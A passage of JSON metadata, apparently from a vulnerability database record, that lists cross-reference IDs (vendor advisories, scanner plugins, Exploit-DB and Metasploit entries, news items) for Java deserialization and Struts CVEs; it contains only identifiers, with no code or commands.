"OPENVAS:1361412562310872759", "OPENVAS:1361412562310873323", "OPENVAS:1361412562310873333", "OPENVAS:1361412562310882333", "OPENVAS:1361412562310882467", "OPENVAS:1361412562310882468", "OPENVAS:1361412562310882469", "OPENVAS:1361412562310882470", "OPENVAS:1361412562310882471", "OPENVAS:1361412562310882485", "OPENVAS:1361412562310882487", "OPENVAS:1361412562310882488", "OPENVAS:1361412562310882576", "OPENVAS:1361412562311220161015", "OPENVAS:1361412562311220161054", "OPENVAS:1361412562311220171213", "OPENVAS:1361412562311220171214", "OPENVAS:703504", "OPENVAS:703524", "OPENVAS:703530", "OPENVAS:703552", "OPENVAS:703558", "OPENVAS:703609", "OPENVAS:703738", "OPENVAS:703739"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2016V3", "ORACLE:CPUAPR2016V3-2985753", "ORACLE:CPUAPR2017", "ORACLE:CPUAPR2017-3236618", "ORACLE:CPUAPR2018", "ORACLE:CPUAPR2018-3678067", "ORACLE:CPUAPR2019", "ORACLE:CPUAPR2019-5072813", "ORACLE:CPUAPR2020", "ORACLE:CPUAPR2021", "ORACLE:CPUAPR2022", "ORACLE:CPUJAN2016", "ORACLE:CPUJAN2016-2367955", "ORACLE:CPUJAN2017", "ORACLE:CPUJAN2017-2881727", "ORACLE:CPUJAN2018", "ORACLE:CPUJAN2018-3236628", "ORACLE:CPUJAN2019", "ORACLE:CPUJAN2019-5072801", "ORACLE:CPUJAN2020", "ORACLE:CPUJAN2021", "ORACLE:CPUJUL2016", "ORACLE:CPUJUL2016-2881720", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2017-3236622", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2018-4258247", "ORACLE:CPUJUL2019", "ORACLE:CPUJUL2019-5072835", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2016", "ORACLE:CPUOCT2016-2881722", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2017-3236626", "ORACLE:CPUOCT2018", "ORACLE:CPUOCT2018-4428296", "ORACLE:CPUOCT2019", "ORACLE:CPUOCT2019-5072832", "ORACLE:CPUOCT2020", "ORACLE:CPUOCT2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-2521", "ELSA-2015-2522", "ELSA-2015-2671", "ELSA-2016-0650", "ELSA-2016-0651", "ELSA-2016-0675", "ELSA-2016-0676", "ELSA-2016-0723", "ELSA-2016-2045", "ELSA-2016-2599", "ELSA-2017-2247", "ELSA-2017-2423", "ELSA-2022-9419"]}, {"type": "osv", "idList": ["OSV:DLA-274-1", "OSV:DLA-435-1", "OSV:DLA-443-1", "OSV:DLA-451-1", "OSV:DLA-728-1", "OSV:DLA-729-1", "OSV:DSA-3504-1", "OSV:DSA-3524-1", "OSV:DSA-3530-1", "OSV:DSA-3552-1", "OSV:DSA-3558-1", "OSV:DSA-3609-1", "OSV:DSA-3738-1", "OSV:DSA-3739-1", "OSV:GHSA-26V6-W6FW-RH94", "OSV:GHSA-26WC-3WQP-G3RP", "OSV:GHSA-2X9H-H3C4-WQQH", "OSV:GHSA-6HGM-866R-3CJV", "OSV:GHSA-FWQR-3PVP-PJWQ", "OSV:GHSA-FXPH-Q3J8-MV87", "OSV:GHSA-GG9M-FJ3V-R58C", "OSV:GHSA-GXG6-RC6C-V673", "OSV:GHSA-HRP3-8P5W-27GV", "OSV:GHSA-HVPR-9CR6-Q5V7", "OSV:GHSA-J77Q-2QQG-6989", "OSV:GHSA-J8G6-2WH7-6439", "OSV:GHSA-MV42-PX54-87JW", "OSV:GHSA-Q9HR-3PG4-3JP4", "OSV:GHSA-QG25-HGJV-CG9Q", "OSV:GHSA-VVJC-Q5VR-52Q6"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:134805", "PACKETSTORM:137486", "PACKETSTORM:141105", "PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:141631", "PACKETSTORM:144034", "PACKETSTORM:144050", "PACKETSTORM:144405", "PACKETSTORM:146143", "PACKETSTORM:146285", "PACKETSTORM:147665", "PACKETSTORM:151535", "PACKETSTORM:152268", "PACKETSTORM:159266"]}, {"type": "pentestit", "idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7", "PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "PENTESTIT:F5DFB26B34C75683830E664CBD58178F"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:49C18614AD01B6865616A65F734B9F71"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhat", "idList": ["RHSA-2015:2500", "RHSA-2015:2501", "RHSA-2015:2502", "RHSA-2015:2514", "RHSA-2015:2516", "RHSA-2015:2517", "RHSA-2015:2521", "RHSA-2015:2522", "RHSA-2015:2523", "RHSA-2015:2524", "RHSA-2015:2534", "RHSA-2015:2535", "RHSA-2015:2536", "RHSA-2015:2537", "RHSA-2015:2538", "RHSA-2015:2539", "RHSA-2015:2540", "RHSA-2015:2542", "RHSA-2015:2547", "RHSA-2015:2556", "RHSA-2015:2557", "RHSA-2015:2558", "RHSA-2015:2559", "RHSA-2015:2560", "RHSA-2015:2578", "RHSA-2015:2579", "RHSA-2015:2670", "RHSA-2015:2671", "RHSA-2016:0040", "RHSA-2016:0066", "RHSA-2016:0070", "RHSA-2016:0118", "RHSA-2016:0489", "RHSA-2016:0539", "RHSA-2016:0540", "RHSA-2016:0650", "RHSA-2016:0651", "RHSA-2016:0675", "RHSA-2016:0676", "RHSA-2016:0677", "RHSA-2016:0678", "RHSA-2016:0679", "RHSA-2016:0701", "RHSA-2016:0702", "RHSA-2016:0708", "RHSA-2016:0711", "RHSA-2016:0716", "RHSA-2016:0723", "RHSA-2016:1039", "RHSA-2016:1087", "RHSA-2016:1088", "RHSA-2016:1135", "RHSA-2016:1376", "RHSA-2016:1430", "RHSA-2016:1773", "RHSA-2016:2035", "RHSA-2016:2036", "RHSA-2016:2045", "RHSA-2016:22381", "RHSA-2016:2599", "RHSA-2016:2807", "RHSA-2016:2808", "RHSA-2017:0455", "RHSA-2017:0456", "RHSA-2017:0457", "RHSA-2017:0868", "RHSA-2017:1216", "RHSA-2017:1253", "RHSA-2017:1254", "RHSA-2017:1255", "RHSA-2017:1256", "RHSA-2017:1260", "RHSA-2017:1409", "RHSA-2017:1410", "RHSA-2017:1411", "RHSA-2017:1412", "RHSA-2017:1417", "RHSA-2017:1675", "RHSA-2017:1676", "RHSA-2017:1801", "RHSA-2017:1802", "RHSA-2017:1832", "RHSA-2017:2423", "RHSA-2017:2486", "RHSA-2017:2596", "RHSA-2017:2633", "RHSA-2017:2635", "RHSA-2017:2636", "RHSA-2017:2637", "RHSA-2017:2638", "RHSA-2017:2808", "RHSA-2017:2809", "RHSA-2017:2810", "RHSA-2017:2811", "RHSA-2017:2888", "RHSA-2017:2889", "RHSA-2017:3244", "RHSA-2017:3399", "RHSA-2017:3400", "RHSA-2018:1607", "RHSA-2018:1608", "RHSA-2018:2909", "RHSA-2018:2913", "RHSA-2019:1545", "RHSA-2020:4274", "RHSA-2021:3140"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-5004", "RH:CVE-2016-6809", "RH:CVE-2016-8735", "RH:CVE-2016-8749", "RH:CVE-2016-9299", "RH:CVE-2016-9606", "RH:CVE-2017-1000353", "RH:CVE-2017-12149", "RH:CVE-2017-2608", "RH:CVE-2017-3159", "RH:CVE-2017-5638", "RH:CVE-2017-5645", "RH:CVE-2017-7504", "RH:CVE-2017-9805", "RH:CVE-2018-1051", "RH:CVE-2019-17571", "RH:CVE-2020-26217", "RH:CVE-2020-26258", "RH:CVE-2020-26259"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:1AF820E0642E7888070E0C7DD723BBAE", "SAINT:2A4358BF31AF1DF12CC0825DE2A0B1D2", "SAINT:364F42DDB229F6E8A0EF4BB04CE504D2", "SAINT:38F4E0E6CE11A2F3EC10321A6DF373E2", "SAINT:484D58D595B8F6CEE787306160971308", "SAINT:49062325B1FAB54D731E4C8FBF78D940", "SAINT:5B8CEB9A64574FBC9B91366BB8FFC719", "SAINT:66FBA7CC8FD20610677EE0D63C3A16A6", "SAINT:966010900F7632E797C552D31C2BB53A", "SAINT:9C099C4B9A40BE916B04858EBBBB06B1", "SAINT:B8E045060F9ACF0F8D488745DBF66B54", "SAINT:C049B327B327D8889E6EDEE0F0EFB1CB", "SAINT:EA211AC1CE6B335FAB2D22929BF61475"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33", "SECURELIST:C7E3F6A27205B506CE8683317323C0BC"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32343", "SECURITYVULNS:DOC:32599", "SECURITYVULNS:VULN:14750"]}, {"type": "seebug", "idList": ["SSV:89999", "SSV:90854", "SSV:90860", "SSV:91276", "SSV:92098", "SSV:92547", "SSV:92553", "SSV:92557", "SSV:92655", "SSV:92746", "SSV:92804", "SSV:92914", "SSV:92965", "SSV:93062", "SSV:96420", "SSV:96733", "SSV:96880", "SSV:96881", "SSV:97009", "SSV:97208", "SSV:97242", "SSV:97346"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:0788-1", "OPENSUSE-SU-2016:0833-1", "OPENSUSE-SU-2016:0865-1", "OPENSUSE-SU-2016:1222-1", "OPENSUSE-SU-2016:1230-1", "OPENSUSE-SU-2016:1235-1", "OPENSUSE-SU-2016:1262-1", "OPENSUSE-SU-2016:1265-1", "OPENSUSE-SU-2016:3129-1", "OPENSUSE-SU-2016:3144-1", "SUSE-SU-2016:0699-1", "SUSE-SU-2016:0700-1", "SUSE-SU-2016:0769-1", "SUSE-SU-2016:0822-1", "SUSE-SU-2016:0839-1", "SUSE-SU-2016:1248-1", "SUSE-SU-2016:1250-1", "SUSE-SU-2016:1299-1", "SUSE-SU-2016:1300-1", "SUSE-SU-2016:1303-1", "SUSE-SU-2016:1378-1", "SUSE-SU-2016:1379-1", "SUSE-SU-2016:1388-1", "SUSE-SU-2016:1458-1", "SUSE-SU-2016:1475-1", "SUSE-SU-2016:3079-1", "SUSE-SU-2016:3081-1", "SUSE-SU-2017:1632-1", "SUSE-SU-2017:1660-1"]}, {"type": "symantec", "idList": ["SMNTC-101304", "SMNTC-1334", "SMNTC-1344", "SMNTC-1353", "SMNTC-97702"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "TALOSBLOG:7B703A19FAC4E490CFFB2AE43C1606DF", "TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:460709FF530ED7F35B5817A55F1BF2C6", "THN:4DE731C9D113C3993C96A773C079023F", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:90DC43ADC5123FED500235ACDF6D6277", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:AF93AEDBDE6169AD1163D53979A4EA04", "THN:BAEF6DAD5A5E413B7D119204D0BFE0A9", "THN:E95B6A75073DA71CEC73B2E4F0B13622", "THN:EEB3BA59922DDC6B345B8E6C153593DA", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F73D624126468D834271728F43F4B725"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:555BCC102B10B8C6CABB0054595AC756", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9041B76CCCD278242DD81A2F7BFCE45E", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:BE009076F7BB03DF3F38AEAC53E3DE88", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D5751787CAB157440E673DD8A0EADEC5", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E43EB029B562B5665C8385E16145288A", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "tomcat", "idList": ["TOMCAT:0DBA25EA40A6FEBF5FD9039D7F60718E", "TOMCAT:1175049C7D69C5CB1659C6031402BD19", "TOMCAT:1C57B8A512794370194BE52DB897DDB3", "TOMCAT:604E2DE63F4E10D22151D29C4D2E7487", "TOMCAT:7FF5C8CC86A7AF5DA33F4B5874774B9B", "TOMCAT:8791F7CDB0177860DFE60DFA1152CCD9", "TOMCAT:9E43DA1677EA0537439D1A6D19A16EC5", "TOMCAT:DCB8C0E7C96DD2367CF48625F7A47EDF", "TOMCAT:F0F8FE52B35B4B90B6C6B9412F88CA1B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913", "TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152"]}, {"type": "ubuntu", "idList": ["USN-2923-1", "USN-2963-1", "USN-2964-1", "USN-2972-1", "USN-3024-1", "USN-3177-1", "USN-3177-2", "USN-4557-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-3253", "UB:CVE-2015-4852", "UB:CVE-2015-5254", "UB:CVE-2015-5377", "UB:CVE-2015-7501", "UB:CVE-2015-8103", "UB:CVE-2016-0714", "UB:CVE-2016-0788", "UB:CVE-2016-2510", "UB:CVE-2016-3427", "UB:CVE-2016-6809", "UB:CVE-2016-8735", "UB:CVE-2016-9299", "UB:CVE-2016-9606", "UB:CVE-2017-1000353", "UB:CVE-2017-12149", "UB:CVE-2017-2608", "UB:CVE-2017-5638", "UB:CVE-2017-5645", "UB:CVE-2017-5878", "UB:CVE-2017-9805", "UB:CVE-2018-1051"]}, {"type": "veracode", "idList": ["VERACODE:13488"]}, {"type": "vmware", "idList": ["VMSA-2015-0009", "VMSA-2015-0009.5", "VMSA-2016-0005", "VMSA-2016-0005.5", "VMSA-2016-0020", "VMSA-2017-0004", "VMSA-2017-0004.7", "VMSA-2017-0007"]}, {"type": "zdi", "idList": ["ZDI-15-365", "ZDI-15-638", "ZDI-16-523", "ZDI-22-506", "ZDI-22-507"]}, {"type": "zdt", "idList": ["1337DAY-ID-23895", "1337DAY-ID-23928", "1337DAY-ID-24727", "1337DAY-ID-26307", "1337DAY-ID-27028", "1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-27317", "1337DAY-ID-28445", "1337DAY-ID-28454", "1337DAY-ID-28583", "1337DAY-ID-28661", "1337DAY-ID-29065", "1337DAY-ID-29066", "1337DAY-ID-29395", "1337DAY-ID-29668", "1337DAY-ID-29736", "1337DAY-ID-30269", "1337DAY-ID-30370", "1337DAY-ID-32135"]}]}, "score": {"value": 10.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "adobe", "idList": ["APSB17-14", "APSB17-30"]}, {"type": "amazon", "idList": ["ALAS-2016-776", "ALAS-2016-777", "ALAS-2016-778"]}, {"type": "archlinux", "idList": ["ASA-201511-11"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:5A79A3DC-D4D7-4FF8-BE45-A4E658714412", "AKB:7992242A-E0F4-4572-BE13-859467611F09", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "AKB:FB2F65B2-D10B-4622-AEE6-41AAD3C1E6E7", "AKB:FF34D034-592E-4D75-BE7B-74387AB0EF37"]}, {"type": "avleonov", "idList": ["AVLEONOV:77E5BDCD31BFF42A59B6BE11B5F5598C"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "centos", "idList": ["CESA-2015:2522", "CESA-2016:2599", "CESA-2017:2423", "CESA-2017:2486"]}, {"type": "cert", "idList": ["VU:112992", "VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-0968", "CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-0742", "CPAI-2017-0884", "CPAI-2017-1019", "CPAI-2017-1066", "CPAI-2017-1088", "CPAI-2018-0013", "CPAI-2018-0130", "CPAI-2018-0799", "CPAI-2019-0387"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:C0680147E070CCC4182A654B22694B78"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2", "CISCO-SA-20170907-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2012-4858", "CVE-2015-8360", "CVE-2016-0714", "CVE-2016-0958", "CVE-2016-1986", "CVE-2016-1999", "CVE-2016-2003", "CVE-2016-3427", "CVE-2016-3461", "CVE-2016-3642", "CVE-2016-4372", "CVE-2016-4385", "CVE-2016-5004", "CVE-2016-8744", "CVE-2016-8749", "CVE-2017-1000353", "CVE-2017-12149", "CVE-2017-3066", "CVE-2017-3159", "CVE-2017-5586", "CVE-2017-5638", "CVE-2017-5878", "CVE-2017-7504", "CVE-2017-9805", "CVE-2017-9844"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3738-1:66970", "DEBIAN:DSA-3739-1:06429"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-5645"]}, {"type": "dsquare", "idList": ["E-643"]}, {"type": "erpscan", "idList": ["ERPSCAN-17-014"]}, {"type": "exploitdb", "idList": ["EDB-ID:41366", "EDB-ID:42627", "EDB-ID:43924", "EDB-ID:43993"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:688851AE0376E48F469617E2884BAE9D", "EXPLOITPACK:E47A4ABCB334901131160C872A570166"]}, {"type": "f5", "idList": ["F5:K04734219", "F5:K23173103", "F5:K43451236", "F5:K84144321", "SOL73112451"]}, {"type": "fedora", "idList": ["FEDORA:0AC1C60C76B5", "FEDORA:125286087B00", "FEDORA:1DA54604D2A3", "FEDORA:341EA6057129", "FEDORA:376506075014", "FEDORA:76CFD605E21F", "FEDORA:8CEB2616D980", "FEDORA:A99066078F69", "FEDORA:EFDAB6050C3B"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:C097B41677EDE5F95DB4B84AD6726751"]}, {"type": "fortinet", "idList": ["FG-IR-17-205"]}, {"type": "freebsd", "idList": ["1F1124FE-DE5C-11E5-8FA8-14DAE9D210B8", "631C4710-9BE5-4A80-9310-EB2847FE24DD", "7E01DF39-DB7E-11E5-B937-00E0814CAB4E", "9E5BBFFC-D8AC-11E5-B2BD-002590263BF5"]}, {"type": "gentoo", "idList": ["GLSA-201606-18"]}, {"type": "github", "idList": ["GHSA-GG9M-FJ3V-R58C", "GHSA-HVPR-9CR6-Q5V7", "GHSA-J77Q-2QQG-6989", "GHSA-J8G6-2WH7-6439", "GHSA-VVJC-Q5VR-52Q6"]}, {"type": "githubexploit", "idList": ["2ED15233-2A01-53F8-A939-8A4D06481CF4", "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "B41082A1-4177-53E2-A74C-8ABA13AA3E86", "C2D99D6A-1A8C-5D55-BBB7-34A978AAC642"]}, {"type": "hackerone", "idList": ["H1:221294"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["1BFF63EB8AF39056E08427B06D34E43B32E43FBCC74FB2A85F32E708984FD60F", "789948D6E2D3214CF6D14873F1BE91C91BC7007F1ACE3F9DD9D9CBFBB98592A9", "8B5016D64A8BBF10B52DDF15458908578A8F9418D5076DA06FD0081F472F9FAA", "C3FB79ADA39B46791DCF93E4A2B6E50FE2792D0E382EF08036106CE4972770C2", "C5DC7E3B34A4B9A3DC0E8C0FAFE2DA531B9CD3D402160B1BD2722664BB8814ED"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:7314019160937441300", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE", "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL", "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_REST_XSTREAM"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201785395", "MYHACK58:62201786819", "MYHACK58:62201789104"]}, {"type": "nessus", "idList": ["AIX_JAVA_APRIL2016_ADVISORY.NASL", "ALA_ALAS-2016-688.NASL", "ALA_ALAS-2016-693.NASL", "ALA_ALAS-2016-700.NASL", "BAMBOO_5_8_5.NASL", "CENTOS_RHSA-2016-0650.NASL", "CENTOS_RHSA-2016-0651.NASL", "CENTOS_RHSA-2016-0675.NASL", "CENTOS_RHSA-2016-0676.NASL", "CENTOS_RHSA-2016-0723.NASL", "CENTOS_RHSA-2017-2423.NASL", "COLDFUSION_WIN_APSB17-14.NASL", "COLDFUSION_WIN_APSB17-30.NASL", "DEBIAN_DLA-435.NASL", "DEBIAN_DLA-443.NASL", "DEBIAN_DSA-3504.NASL", "EULEROS_SA-2017-1213.NASL", "EULEROS_SA-2017-1214.NASL", "F5_BIGIP_SOL30518307.NASL", "FEDORA_2016-005AC9CFD5.NASL", "FEDORA_2016-6CF17AD0DF.NASL", "FEDORA_2016-F099190FEE.NASL", "FEDORA_2017-11EDC0D6C3.NASL", "FEDORA_2017-2CCFBD650A.NASL", "FEDORA_2017-511EBFA8A3.NASL", "FEDORA_2017-7E0FF7F73A.NASL", "FEDORA_2017-8348115ACD.NASL", "FEDORA_2017-B8358CDA24.NASL", "FREEBSD_PKG_1F1124FEDE5C11E58FA814DAE9D210B8.NASL", "FREEBSD_PKG_5CFA9D0C73D74642AF4F28FBED9E9404.NASL", "FREEBSD_PKG_631C47109BE54A809310EB2847FE24DD.NASL", "FREEBSD_PKG_9E5BBFFCD8AC11E5B2BD002590263BF5.NASL", "HP_NETWORK_AUTOMATION_HPSBGN03649.NASL", "OPENSUSE-2016-351.NASL", "OPENSUSE-2016-553.NASL", "OPENSUSE-2016-554.NASL", "OPENSUSE-2016-560.NASL", "OPENSUSE-2016-572.NASL", "OPENSUSE-2016-573.NASL", "ORACLELINUX_ELSA-2015-2522.NASL", "ORACLELINUX_ELSA-2016-0650.NASL", "ORACLELINUX_ELSA-2016-0651.NASL", "ORACLELINUX_ELSA-2016-0675.NASL", "ORACLELINUX_ELSA-2016-0676.NASL", "ORACLELINUX_ELSA-2016-0723.NASL", "ORACLE_BI_PUBLISHER_OCT_2018_CPU.NASL", "ORACLE_HTTP_SERVER_CPU_JAN_2018.NASL", "ORACLE_JROCKIT_CPU_APR_2016.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2016.NBIN", "REDHAT-RHSA-2015-2522.NASL", "REDHAT-RHSA-2016-0489.NASL", "REDHAT-RHSA-2016-0650.NASL", "REDHAT-RHSA-2016-0651.NASL", "REDHAT-RHSA-2016-0675.NASL", "REDHAT-RHSA-2016-0676.NASL", "REDHAT-RHSA-2016-0677.NASL", "REDHAT-RHSA-2016-0678.NASL", "REDHAT-RHSA-2016-0679.NASL", "REDHAT-RHSA-2016-0701.NASL", "REDHAT-RHSA-2016-0702.NASL", "REDHAT-RHSA-2016-0708.NASL", "REDHAT-RHSA-2016-0716.NASL", "REDHAT-RHSA-2016-0723.NASL", "REDHAT-RHSA-2016-1039.NASL", "REDHAT-RHSA-2017-1254.NASL", "REDHAT-RHSA-2017-1256.NASL", "REDHAT-RHSA-2017-1260.NASL", "REDHAT-RHSA-2017-2635.NASL", "REDHAT-RHSA-2017-2636.NASL", "REDHAT-RHSA-2017-2637.NASL", "REDHAT-RHSA-2017-2638.NASL", "REDHAT-RHSA-2018-1607.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL6_X.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL7_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL6_X.NASL", "SL_20160509_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "STRUTS_2_5_13.NASL", "SUSE_SU-2016-1248-1.NASL", "SUSE_SU-2016-1250-1.NASL", "UBUNTU_USN-2923-1.NASL", "UBUNTU_USN-2963-1.NASL", "UBUNTU_USN-2964-1.NASL", "UBUNTU_USN-2972-1.NASL", "VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2017-0007.NASL", "VMWARE_VCENTER_VMSA-2016-0005.NASL", "VMWARE_VCENTER_VMSA-2017-0007.NASL", "VMWARE_VCLOUD_DIRECTOR_VMSA-2016-0005.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA_2016_0005.NASL", "VMWARE_VSPHERE_REPLICATION_VMSA_2016_0005.NASL", "WEBSPHERE_JAVA_SERIALIZE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310107156", "OPENVAS:1361412562310107157", "OPENVAS:1361412562310140063", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310140254", "OPENVAS:1361412562310807332", "OPENVAS:1361412562310810938", "OPENVAS:1361412562310811696", "OPENVAS:1361412562310813537", "OPENVAS:1361412562310869959", "OPENVAS:1361412562310871877", "OPENVAS:1361412562310872149", "OPENVAS:1361412562310872150", "OPENVAS:1361412562310872157", "OPENVAS:1361412562310872442", "OPENVAS:1361412562310872637", "OPENVAS:1361412562310872638", "OPENVAS:1361412562310872757", "OPENVAS:1361412562310872759", "OPENVAS:703738", "OPENVAS:703739"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2016", "ORACLE:CPUOCT2019-5072832"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-2521", "ELSA-2015-2522", "ELSA-2015-2671", "ELSA-2016-0650", "ELSA-2016-0651", "ELSA-2016-0675", "ELSA-2016-0676", "ELSA-2016-0723"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:137486", "PACKETSTORM:141105", "PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:144034", "PACKETSTORM:144050", "PACKETSTORM:146143", "PACKETSTORM:146285"]}, {"type": "pentestit", "idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED"]}, 